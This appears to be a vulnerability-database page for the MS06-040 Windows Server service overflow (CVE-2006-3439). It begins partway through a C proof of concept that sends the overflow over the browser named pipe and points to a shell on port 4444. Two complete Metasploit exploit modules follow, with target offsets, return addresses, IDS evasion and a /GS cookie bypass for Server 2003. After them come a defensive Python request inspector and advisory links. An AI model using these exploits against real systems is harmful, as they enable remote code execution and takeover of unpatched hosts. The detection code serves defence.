        memcpy(szReqBuf+768, DCERPC_Request_RPC_Service_, sizeof(DCERPC_Request_RPC_Service_)-1);
    }

    printf("[+] Connecting to %s ... \n", argv[1]);
    _snprintf(szRemoteName, sizeof(szRemoteName), "\\\\%s\\ipc$", argv[1]);
    nr.dwType = RESOURCETYPE_ANY;
    nr.lpLocalName = NULL;
    nr.lpProvider = NULL;
    nr.lpRemoteName = szRemoteName;
    if (WNetAddConnection2(&nr, "", "", 0) != NO_ERROR) {
        printf("[-] Failed to connect to host !\n");
        return -1;
    }

    _snprintf(szPipePath, sizeof(szPipePath), "\\\\%s\\pipe\\browser", argv[1]);
    hFile = CreateFile(szPipePath, GENERIC_READ|GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (hFile == INVALID_HANDLE_VALUE) {
        printf("[-] Failed to open named pipe !\n");
        return -1;
    }

    printf("[+] Binding to RPC interface ... \n");
    if (TransactNamedPipe(hFile, DCERPC_Bind_RPC_Service, sizeof(DCERPC_Bind_RPC_Service),
                          szInBuf, sizeof(szInBuf), &dwRead, NULL) == 0) {
        printf("[-] Failed to bind to interface !\n");
        CloseHandle(hFile);
        return -1;
    }

    printf("[+] Sending RPC request ... \n");
    if (!WriteFile(hFile, szReqBuf, sizeof(szReqBuf), &nWritten, 0)) {
        printf("[-] Unable to transmit RPC request !\n");
        CloseHandle(hFile);
        return -1;
    }

    printf("[+] Now check for shell on %s:4444 !\n", argv[1]);
    return 0;
}

// milw0rm.com [2006-08-28]
Exploit Database EDB-ID: 2162

Publication date: 2006-08-09 22h00 +00:00
Author: H D Moore
EDB Verified: Yes

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::netapi_ms06_040;
use base "Msf::Exploit";
use strict;
use Pex::DCERPC;
use Pex::NDR;

my $advanced = {
    'FragSize'    => [ 256, 'The DCERPC fragment size' ],
    'BindEvasion' => [ 0, 'IDS Evasion of the bind request' ],
    'DirectSMB'   => [ 0, 'Use direct SMB (445/tcp)' ],
};

my $info = {
    'Name'    => 'Microsoft NetpIsRemote() MSO6-040 Overflow',
    'Version' => '$Revision: 3715 $',
    'Authors' => [ 'H D Moore <hdm [at] metasploit.com>', ],
    'Arch'    => ['x86'],
    'OS'      => [ 'win32', 'win2000', 'winxp', 'win2003' ],
    'Priv'    => 1,

    'AutoOpts' => { 'EXITFUNC' => 'thread' },

    'UserOpts' => {
        'RHOST' => [ 1, 'ADDR', 'The target address' ],

        # SMB connection options
        'SMBUSER' => [ 0, 'DATA', 'The SMB username to connect with', '' ],
        'SMBPASS' => [ 0, 'DATA', 'The password for specified SMB username', '' ],
        'SMBDOM'  => [ 0, 'DATA', 'The domain for specified SMB username', '' ],
    },

    'Payload' => {
        # Technically we can use more space than this, but by limiting it
        # to 370 bytes we can use the same request for all Windows SPs.
        'Space'    => 370,
        'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
        'Keys'     => ['+ws2ord'],

        # sub esp, 4097 + inc esp makes stack happy
        'Prepend'  => "\x81\xc4\xff\xef\xff\xff\x44",
    },

    'Description' => Pex::Text::Freeform( qq{
        This module exploits a stack overflow in the NetApi32 NetpIsRemote()
        function using the NetpwPathCanonicalize RPC call in the Server
        Service. It is likely that other RPC calls could be used to exploit
        this service. This exploit will result in a denial of service on
        Windows XP SP2 or Windows 2003 SP1. A failed exploit attempt will
        likely result in a complete reboot on Windows 2000 and the
        termination of all SMB-related services on Windows XP. The default
        target for this exploit should succeed on Windows NT 4.0, Windows
        2000 SP0-SP4+, and Windows XP SP0-SP1.
    } ),

    'Refs' => [
        [ 'BID', '19409' ],
        [ 'CVE', '2006-3439' ],
        [ 'MSB', 'MS06-040' ],
    ],

    'DefaultTarget' => 0,
    'Targets' => [
        [ '(wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)' ],
        [ '(wcscpy) Windows NT 4.0 / Windows 2000 SP0-SP4', 1000, 0x00020804 ],
        [ '(wcscpy) Windows XP SP0/SP1', 612, 0x00020804 ],
        [ '(stack) Windows XP SP1 English', 656, 680, 0x71ab1d54], # jmp esp @ ws2_32.dll
    ],

    'Keys' => ['srvsvc'],
    'DisclosureDate' => 'Aug 08 2006',
};

sub new {
    my ($class) = @_;
    my $self = $class->SUPER::new( { 'Info' => $info, 'Advanced' => $advanced }, @_ );
    return ($self);
}

sub Exploit {
    my ($self) = @_;
    my $target_host = $self->GetVar('RHOST');
    my $target_port = $self->GetVar('RPORT');
    my $target_idx  = $self->GetVar('TARGET');
    my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
    my $target_name = '*SMBSERVER';
    my $FragSize    = $self->GetVar('FragSize') || 256;
    my $target      = $self->Targets->[$target_idx];

    if (!$self->InitNops(128)) {
        $self->PrintLine("Could not initialize the nop module");
        return;
    }

    my ( $res, $rpc );

    my $pipe    = '\BROWSER';
    my $uuid    = '4b324fc8-1670-01d3-1278-5a47bf6ee188';
    my $version = '3.0';

    my $handle = Pex::DCERPC::build_handle( $uuid, $version, 'ncacn_np', $target_host, $pipe );

    my $dce = Pex::DCERPC->new(
        'handle'      => $handle,
        'username'    => $self->GetVar('SMBUSER'),
        'password'    => $self->GetVar('SMBPASS'),
        'domain'      => $self->GetVar('SMBDOM'),
        'fragsize'    => $self->GetVar('FragSize'),
        'bindevasion' => $self->GetVar('BindEvasion'),
        'directsmb'   => $self->GetVar('DirectSMB'),
    );

    if ( !$dce ) {
        $self->PrintLine("[*] Could not bind to $handle");
        return;
    }

    my $smb = $dce->{'_handles'}{$handle}{'connection'};
    if (! $smb) {
        $self->PrintLine("[*] Could not establish SMB session");
        return;
    }

    if ( $target->[0] =~ /Automatic/ ) {
        if ( $smb->PeerNativeOS eq 'Windows 5.0' ) {
            $target = $self->Targets->[1];
            $self->PrintLine('[*] Detected a Windows 2000 target');
        }
        elsif ( $smb->PeerNativeOS eq 'Windows 5.1' ) {
            $target = $self->Targets->[2];
            $self->PrintLine('[*] Detected a Windows XP target');
            $self->PrintLine('[*] This will not work on SP2!');
        }
        elsif ( $smb->PeerNativeOS eq 'Windows 4.0' ) {
            $target = $self->Targets->[1];
            $self->PrintLine('[*] Detected a Windows NT 4.0 target');
            $self->PrintLine('[*] Please email us with the results!');
        }
        else {
            $self->PrintLine('[*] No target available for ' . $smb->PeerNativeOS() );
            return;
        }
    }

    #
    # /* Function 0x1f at 0x767e912c */
    # long function_1f (
    #   [in] [unique] [string] wchar_t * arg_00,
    #   [in] [string] wchar_t * arg_01,
    #   [out] [size_is(arg_03)] char * arg_02,
    #   [in] [range(0, 64000)] long arg_03,
    #   [in] [string] wchar_t * arg_04,
    #   [in,out] long * arg_05,
    #   [in] long arg_06
    # );
    #

    my $stub;

    #
    # Use the wcscpy() method on NT 4.0 / 2000
    #
    if ($target->[0] =~ /2000/ && ! $target->[3]) {

        # Pad our shellcode out with nops
        $shellcode = $self->MakeNops($target->[1] - length($shellcode)) . $shellcode;

        # Stick it into a path
        my $path = $shellcode . (pack('V', $target->[2]) x 16) . "\x00\x00";

        # Package that into a stub
        $stub =
            Pex::NDR::Long(int(rand(0xffffffff))).
            Pex::NDR::UnicodeConformantVaryingString('').
            Pex::NDR::UnicodeConformantVaryingStringPreBuilt($path).
            Pex::NDR::Long(int(rand(250)+1)).
            Pex::NDR::UnicodeConformantVaryingStringPreBuilt( "\xeb\x02" . "\x00\x00").
            Pex::NDR::Long(int(rand(250)+1)).
            Pex::NDR::Long(0);

    #
    # Use the wcscpy() method on XP SP0/SP1
    #
    } elsif ($target->[0] =~ /XP/ && ! $target->[3]) {

        # XP SP0/SP1
        my $path =
            # Shellcode (corrupted ~420 bytes in)
            $shellcode.
            # Padding
            Pex::Text::AlphaNumText($target->[1] - length($shellcode)).
            # Land 6 bytes in to bypass garbage (XP SP0)
            pack('V', $target->[2] + 6).
            # Padding
            Pex::Text::AlphaNumText(8).
            # Address to write our shellcode (XP SP0)
            pack('V', $target->[2]).
            # Padding (required)
            Pex::Text::AlphaNumText(32).
            # Jump straight to shellcode (XP SP1)
            pack('V', $target->[2]).
            # Padding
            Pex::Text::AlphaNumText(8).
            # Address to write our shellcode (XP SP1)
            pack('V', $target->[2]).
            # Padding (required)
            Pex::Text::AlphaNumText(32).
            # Terminate
            "\x00\x00";

        # Package that into a stub
        $stub =
            Pex::NDR::Long(int(rand(0xffffffff))).
            Pex::NDR::UnicodeConformantVaryingString('').
            Pex::NDR::UnicodeConformantVaryingStringPreBuilt($path).
            Pex::NDR::Long(int(rand(250)+1)).
            Pex::NDR::UnicodeConformantVaryingString('').
            Pex::NDR::Long(int(rand(250)+1)).
            Pex::NDR::Long(0);

    #
    # Use the stack overflow method if a return address is set
    #
    } elsif( $target->[3]) {

        my $buff = Pex::Text::AlphaNumText(800);
        substr($buff, 0, length($shellcode), $shellcode);
        substr($buff, $target->[1], 4, pack('V', $target->[3]));
        substr($buff, $target->[2], 5, "\xe9" . pack('V', ($target->[1] + 5) * -1 ));

        my $path = "\\\x00\\\x00". $buff. "\x00\x00";

        # Package that into a stub
        $stub =
            Pex::NDR::Long(int(rand(0xffffffff))).
            Pex::NDR::UnicodeConformantVaryingString('').
            Pex::NDR::UnicodeConformantVaryingStringPreBuilt($path).
            Pex::NDR::Long(int(rand(250)+1)).
            Pex::NDR::UnicodeConformantVaryingString('').
            Pex::NDR::Long(int(rand(250)+1)).
            Pex::NDR::Long(0);

    } else {
        $self->PrintLine("This target is not currently supported");
        return;
    }

    $self->PrintLine("[*] Sending request...");

    # Function 0x1f is not the only way to exploit this :-)
    my @response = $dce->request( $handle, 0x1f, $stub );

    if ( length($dce->{'response'}->{'StubData'}) > 0) {
        $self->PrintLine("[*] The server rejected it, trying again...");
        @response = $dce->request( $handle, 0x1f, $stub );
    }

    if ( length($dce->{'response'}->{'StubData'}) > 0) {
        $self->PrintLine("[*] This system may be patched or running Windows XP SP1 or SP2");
    }

    if (@response) {
        $self->PrintLine('[*] RPC server responded with:');
        foreach my $line (@response) {
            $self->PrintLine( '[*] ' . $line );
        }
    }

    return;
}

1;

# milw0rm.com [2006-08-10]
Exploit Database EDB-ID: 2355

Publication date: 2006-09-12 22h00 +00:00
Author: Trirat Puttaraksa
EDB Verified: Yes

#########################################################################
# netapi_win2003.pm (MS06-040 Exploit for Windows Server 2003 SP0)
#
# Author: Trirat Puttaraksa (Kira) <trir00t [at] gmail.com>
#
# http://sf-freedom.blogspot.com
#
# For educational purposes only
#
# Note: This exploit was developed because of my question "Is it exploitable
# on the Windows Server 2003 platform?". As I know, Windows XP SP2 and Windows
# Server 2003 SP1 are not exploitable because they are compiled with /GS, but
# how about Windows Server 2003 SP0? In Metasploit's netapi_ms06_040.pm there
# is no Windows Server 2003 SP0 target; does this mean 2003 SP0 is not
# exploitable? There is stack protection on Windows Server 2003; is this the
# reason why there is no Windows Server 2003 SP0 exploit for MS06-040?
#
# I started to modify H D Moore's exploit (netapi_ms06_040.pm - credits to him
# ^-^) and worked on it. The problem is the stack protection "security cookie
# checking". Because the wcscpy() method allows me to write to any memory location
# that is marked writable, I decided to write to the location where the "security
# cookie" is stored, and it works !!! I will describe more implementation details
# in my blog in a few days ^-^
#
# This exploit was tested on Windows Server 2003 SP0 build 3790 and successfully
# exploited the 2003 machine in my environment - all patches before MS06-040
# (KB921883). It's quite reliable but not 100%. There is the possibility that
# the exploit will fail and the target system process will crash. Because I have
# only one testbase system, I couldn't confirm this exploit will work in
# your environment. However, feel free to e-mail me.
#
# Credits: H D Moore
#########################################################################

package Msf::Exploit::netapi_win2003;
use base "Msf::Exploit";
use strict;
use Pex::DCERPC;
use Pex::NDR;

my $advanced = {
    'FragSize'    => [ 256, 'The DCERPC fragment size' ],
    'BindEvasion' => [ 0, 'IDS Evasion of the bind request' ],
    'DirectSMB'   => [ 0, 'Use direct SMB (445/tcp)' ],
};

my $info = {
    'Name'    => 'MSO6-040 Windows Server 2003 Target',
    'Version' => '',
    'Authors' => [ 'Trirat Puttaraksa (Kira) <trir00t [at] gmail.com>', ],
    'Arch'    => ['x86'],
    'OS'      => [ 'win32', 'win2003' ],
    'Priv'    => 1,

    'AutoOpts' => { 'EXITFUNC' => 'thread' },

    'UserOpts' => {
        'RHOST' => [ 1, 'ADDR', 'The target address' ],

        # SMB connection options
        'SMBUSER' => [ 0, 'DATA', 'The SMB username to connect with', '' ],
        'SMBPASS' => [ 0, 'DATA', 'The password for specified SMB username', '' ],
        'SMBDOM'  => [ 0, 'DATA', 'The domain for specified SMB username', '' ],
    },

    'Payload' => {
        # Technically we can use more space than this, but by limiting it
        # to 370 bytes we can use the same request for all Windows SPs.
        'Space'    => 370,
        'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
        'Keys'     => ['+ws2ord'],

        # sub esp, 4097 + inc esp makes stack happy
        'Prepend'  => "\x81\xc4\xff\xef\xff\xff\x44",
    },

    'Description' => Pex::Text::Freeform( qq{
        This exploit is modified from netapi_ms06_040.pm (Metasploit). While
        netapi_ms06_040 of Metasploit works on Windows 2000 SP0 - SP4 and
        Windows XP SP0 - SP1, this exploit works on Windows Server 2003 SP0.
    } ),

    'Refs' => [
        [ 'BID', '19409' ],
        [ 'CVE', '2006-3439' ],
        [ 'MSB', 'MS06-040' ],
    ],

    'DefaultTarget' => 0,
    'Targets' => [
        [ '(wcscpy) Windows Server 2003 SP0', 612],
    ],

    'Keys' => ['srvsvc'],
    'DisclosureDate' => '',
};

sub new {
    my ($class) = @_;
    my $self = $class->SUPER::new( { 'Info' => $info, 'Advanced' => $advanced }, @_ );
    return ($self);
}

sub Exploit {
    my ($self) = @_;
    my $target_host = $self->GetVar('RHOST');
    my $target_port = $self->GetVar('RPORT');
    my $target_idx  = $self->GetVar('TARGET');
    my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
    my $target_name = '*SMBSERVER';
    my $FragSize    = $self->GetVar('FragSize') || 256;
    my $target      = $self->Targets->[$target_idx];

    if (!$self->InitNops(128)) {
        $self->PrintLine("Could not initialize the nop module");
        return;
    }

    my ( $res, $rpc );

    my $pipe    = '\BROWSER';
    my $uuid    = '4b324fc8-1670-01d3-1278-5a47bf6ee188';
    my $version = '3.0';

    my $handle = Pex::DCERPC::build_handle( $uuid, $version, 'ncacn_np', $target_host, $pipe );

    my $dce = Pex::DCERPC->new(
        'handle'      => $handle,
        'username'    => $self->GetVar('SMBUSER'),
        'password'    => $self->GetVar('SMBPASS'),
        'domain'      => $self->GetVar('SMBDOM'),
        'fragsize'    => $self->GetVar('FragSize'),
        'bindevasion' => $self->GetVar('BindEvasion'),
        'directsmb'   => $self->GetVar('DirectSMB'),
    );

    if ( !$dce ) {
        $self->PrintLine("[*] Could not bind to $handle");
        return;
    }

    my $smb = $dce->{'_handles'}{$handle}{'connection'};
    if (! $smb) {
        $self->PrintLine("[*] Could not establish SMB session");
        return;
    }

    my $stub;

    #
    # Use the wcscpy() method on Windows Server 2003 SP0
    #
    if ($target->[0] =~ /2003/) {

        my $path =
            $shellcode.
            # Padding
            Pex::Text::AlphaNumText($target->[1] - length($shellcode)).
            Pex::Text::AlphaNumText(32).
            substr($shellcode, 0, 4).     # cookie
            Pex::Text::AlphaNumText(4).
            # return address == address that store security cookie
            ("\xec\xc1\xc8\x71") .
            Pex::Text::AlphaNumText(8).
            ("\xec\xc1\xc8\x71" x 2) .
            Pex::Text::AlphaNumText(36).
            # Terminate
            "\x00\x00";

        # Package that into a stub
        $stub =
            Pex::NDR::Long(int(rand(0xffffffff))).
            Pex::NDR::UnicodeConformantVaryingString('').
            Pex::NDR::UnicodeConformantVaryingStringPreBuilt($path).
            Pex::NDR::Long(int(rand(250)+1)).
            Pex::NDR::UnicodeConformantVaryingString('').
            Pex::NDR::Long(int(rand(250)+1)).
            Pex::NDR::Long(0);

    } else {
        $self->PrintLine("This target is not currently supported");
        return;
    }

    $self->PrintLine("[*] Sending request...");

    # Function 0x1f is not the only way to exploit this :-)
    my @response = $dce->request( $handle, 0x1f, $stub );

    if ( length($dce->{'response'}->{'StubData'}) > 0) {
        $self->PrintLine("[*] The server rejected it, trying again...");
        @response = $dce->request( $handle, 0x1f, $stub );
    }

    if ( length($dce->{'response'}->{'StubData'}) > 0) {
        $self->PrintLine("[*] Exploit Failed");
    }

    if (@response) {
        $self->PrintLine('[*] RPC server responded with:');
        foreach my $line (@response) {
            $self->PrintLine( '[*] ' . $line );
        }
    }

    return;
}

1;

# milw0rm.com [2006-09-13]
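The C proof of concept (EDB-ID 2265) and the IDL comment in the Metasploit module (EDB-ID 2162) together document the wire layout that every exploit above relies on: a DCE/RPC request PDU for opnum 0x1f (NetprPathCanonicalize) on the srvsvc interface, whose stub carries a [unique] server-name pointer followed by the path as an NDR conformant-varying wide string. The following is an added, defender-side example and is not code from the page or from any of the exploit authors: it parses that layout and flags requests whose path argument is implausibly long or whose NDR counts do not fit inside the PDU, which is the kind of check an IDS rule or a pipe-traffic analyser would apply. The 260-wide-char threshold, the `inspect_request`/`build_request` names and the constructed sample PDUs are assumptions made for this example, not values from the page.

```python
"""Inspect DCE/RPC request PDUs for oversized NetprPathCanonicalize (opnum 0x1f)
path arguments. Added example; the threshold and helper names are assumptions."""
import struct

SRVSVC_PATH_CANON_OPNUM = 0x1F   # opnum named in the exploits' IDL comment
MAX_PLAUSIBLE_PATH_WCHARS = 260  # assumed bound: a real share path is MAX_PATH-sized


def _read_cvs(buf, off):
    """Read an NDR conformant-varying wide string header at `off`.

    Returns (max_count, actual_count, next_off); next_off is 4-byte aligned
    past the string data, which is where NDR places the following field.
    """
    if off + 12 > len(buf):
        raise ValueError("truncated string header")
    max_count, _offset, actual = struct.unpack_from("<III", buf, off)
    off += 12
    if actual > max_count or off + actual * 2 > len(buf):
        raise ValueError("string counts exceed the PDU")
    off += actual * 2
    return max_count, actual, (off + 3) & ~3


def inspect_request(pdu):
    """Classify one PDU: 'suspicious' is True for an oversized or malformed
    NetprPathCanonicalize path argument, False for anything else."""
    if len(pdu) < 24:
        return {"suspicious": False, "reason": "short PDU"}
    version, _minor, ptype, _flags = struct.unpack_from("<BBBB", pdu, 0)
    opnum = struct.unpack_from("<H", pdu, 22)[0]      # opnum sits at bytes 22..23
    if version != 5 or ptype != 0:                    # only request PDUs carry a stub
        return {"suspicious": False, "reason": "not a DCE/RPC request"}
    if opnum != SRVSVC_PATH_CANON_OPNUM:
        return {"opnum": opnum, "suspicious": False, "reason": "other opnum"}
    try:
        off = 24                                      # stub data follows the 24-byte header
        referent = struct.unpack_from("<I", pdu, off)[0]
        off += 4
        if referent != 0:                             # [unique] server-name pointer present
            _, _, off = _read_cvs(pdu, off)
        max_count, actual, _ = _read_cvs(pdu, off)    # the [string] path argument
    except ValueError as exc:
        return {"opnum": opnum, "suspicious": True, "reason": str(exc)}
    result = {"opnum": opnum, "path_wchars": actual, "max_count": max_count}
    if actual > MAX_PLAUSIBLE_PATH_WCHARS:
        result.update(suspicious=True, reason=f"path of {actual} wide chars")
    else:
        result.update(suspicious=False, reason="plausible path length")
    return result


def _cvs(text):
    """Encode text as a NUL-terminated NDR conformant-varying wide string."""
    data = (text + "\x00").encode("utf-16-le")
    n = len(data) // 2
    body = struct.pack("<III", n, 0, n) + data
    return body + b"\x00" * (-len(body) % 4)


def build_request(path, opnum=SRVSVC_PATH_CANON_OPNUM):
    """Constructed test fixture (not captured traffic): a well-formed request PDU
    whose stub follows the IDL order server name, path, out-buffer size, prefix
    string and the two trailing longs."""
    stub = (struct.pack("<I", 0x20000) + _cvs("SERVER") + _cvs(path)
            + struct.pack("<I", 64) + _cvs("") + struct.pack("<II", 1, 0))
    header = struct.pack("<BBBB4sHHIIHH", 5, 0, 0, 3, b"\x10\x00\x00\x00",
                         24 + len(stub), 0, 1, len(stub), 0, opnum)
    return header + stub


if __name__ == "__main__":
    for sample in (r"\\srv\share\doc.txt", "A" * 1000):
        print(inspect_request(build_request(sample)))
```

Run on a benign path the inspector reports a plausible length; on a 1000-character path it flags the request, and a PDU whose actual count is larger than its max count (or than the PDU itself) is flagged as malformed before any length comparison. Matching on opnum plus NDR count sanity, rather than on shellcode bytes, is what keeps the check independent of the particular payload in any one exploit.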

Products Mentioned

Configuration 0

Microsoft>>Windows_2000 >> Version *
Microsoft>>Windows_2003_server >> Version 64-bit
Microsoft>>Windows_2003_server >> Version itanium
Microsoft>>Windows_2003_server >> Version r2
Microsoft>>Windows_2003_server >> Version sp1
Microsoft>>Windows_2003_server >> Version sp1
Microsoft>>Windows_xp >> Version *
Microsoft>>Windows_xp >> Version *
Microsoft>>Windows_xp >> Version *

References

http://www.kb.cert.org/vuls/id/650769
Tags: third-party-advisory, x_refsource_CERT-VN
http://securitytracker.com/id?1016667
Tags: vdb-entry, x_refsource_SECTRACK
http://www.securityfocus.com/bid/19409
Tags: vdb-entry, x_refsource_BID
http://www.us-cert.gov/cas/techalerts/TA06-220A.html
Tags: third-party-advisory, x_refsource_CERT
http://www.vupen.com/english/advisories/2006/3210
Tags: vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/21388
Tags: third-party-advisory, x_refsource_SECUNIA